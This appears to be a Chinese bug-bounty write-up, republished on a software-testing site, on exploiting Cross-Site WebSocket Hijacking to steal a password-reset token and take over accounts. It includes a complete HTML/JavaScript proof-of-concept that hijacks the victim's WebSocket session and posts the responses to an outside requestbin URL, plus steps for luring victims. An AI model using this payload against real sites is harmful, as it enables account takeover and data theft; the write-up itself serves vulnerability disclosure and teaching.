利用WebSocket跨站劫持(CSWH)漏洞接管帐户

发表于:2019-3-13 09:50

字体: | 上一篇 | 下一篇 | 我要投稿

 作者:NOSEC安全讯息平台    来源:今日头条

#
漏洞
分享:
  在一次漏洞悬赏活动中,我发现了一个使用WebSocket连接的应用,所以我检查了WebSocket URL,发现它很容易受到CSWH的攻击(WebSocket跨站劫持)
  有关CSWH的更多详细信息,可以访问以下链接了解
  https://www.christian-schneider.net/CrossSiteWebSocketHijacking.html
  首先,我们假设一个应用是通过以下URL建立websocket连接的 wss://website.com。关于验证URL是否存在CSWH漏洞可以遵循以下步骤:
  在浏览器上打开Web应用并登录。
  在新选项卡中输入http://websocket.org/echo.html,输入WebSocket URL并单击“连接”。
  建立连接后,你必须能够从此页面向服务器发送数据帧。接着,使用burpsuite的proxy捕获websocket数据帧进行调试,多次发送,查看服务器如何响应。如果burp的回应和网页的回应一样,则表示目标很可能容易受到WebSocket跨站劫持的攻击
 
  通过以上步骤,我确定应用存在CSWH漏洞。
  一旦在新选项卡上建立了WebSocket连接,我就收到了下面的websocket响应
  
  从上述响应中你可看到,参数“_forgotPasswordId”的值为“null”。
  现在我需要“_forgotPasswordId”参数来发送恶意请求来重置密码。
 
  我再次测试了Websocket连接,这次观察到了如下回应,它包含一个forgetPasswordID令牌
  利用
  现在准备CSWH漏洞的利用链,重置密码接管帐户。以下由HTML代码组成的payload会发送XHR请求,并把回应导向攻击者控制的站点。
   <!-- Reference http://www.websocket.org/echo.html -->
  <!DOCTYPE html>
  <me ta charset="utf-8" />
  <title>Testing</title>
  <sc ript language="ja vasc ript" type="text/ja vasc ript">
  var wsUri = "wss://host.com";
  var output;
  function init()
  {
  output = document.getElementById("output");
  testWebSocket();
  }
  function testWebSocket()
  {
  websocket = new WebSocket(wsUri);
  websocket.onopen = function(evt) { onOpen(evt) };
  websocket.onclose = function(evt) { onClose(evt) };
  websocket.onmessage = function(evt) { onMessage(evt) };
  websocket.on error = function(evt) { on error(evt) };
  }
  function onOpen(evt)
  {
  writeToScreen("CONNECTED");
  doSend('websocket fr ame ');
  }
  function onClose(evt)
  {
  writeToScreen("DISCONNECTED");
  }
  function onMessage(evt)
  {
  var xhr = new xm lHttpRequest();
  xhr.open("POST", "http://requestbin.fullcontact.com/1143n2w1", true);
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
  xhr.send(evt.data);
  websocket.close();
  }
  function on error(evt)
  {
  writeToScreen('<span style="color: red;">ERROR:</span> ' + evt.data);
  }
  function doSend(message)
  {
  writeToScreen("SENT: " + message);
  websocket.send(message);
  }
  function writeToScreen(message)
  {
  var pre = document.createElement("p");
  pre.style.wordWrap = "break-word";
  pre.innerHTML = message;
  output.appendChild(pre);
  }
  window.addEventListener("load", init, false);
  </sc ript>
  <h2>WebSocket Test</h2>
  <di v id="output"></di v>
  攻击步骤
  利用“忘记密码”页面,发送受害者帐户的密码重置请求
  托管以上html到公网网站上,并向受害者发送这个URL(类似于CSRF攻击)
  一旦受害者点击URL,就可以在监听器上得到websocket响应,如下图所示
  
  拥有这个“forgotPasswordID”令牌,我们就可以重置受害者密码。
  
      上文内容不用于商业目的,如涉及知识产权问题,请权利人联系博为峰小编(021-64471599-8017),我们将立即处理。
《2023软件测试行业现状调查报告》独家发布~

关注51Testing

联系我们

快捷面板 站点地图 联系我们 广告服务 关于我们 站长统计 发展历程

法律顾问:上海兰迪律师事务所 项棋律师
版权所有 上海博为峰软件技术股份有限公司 Copyright©51testing.com 2003-2024
投诉及意见反馈:webmaster@51testing.com; 业务联系:service@51testing.com 021-64471599-8017

沪ICP备05003035号

沪公网安备 31010102002173号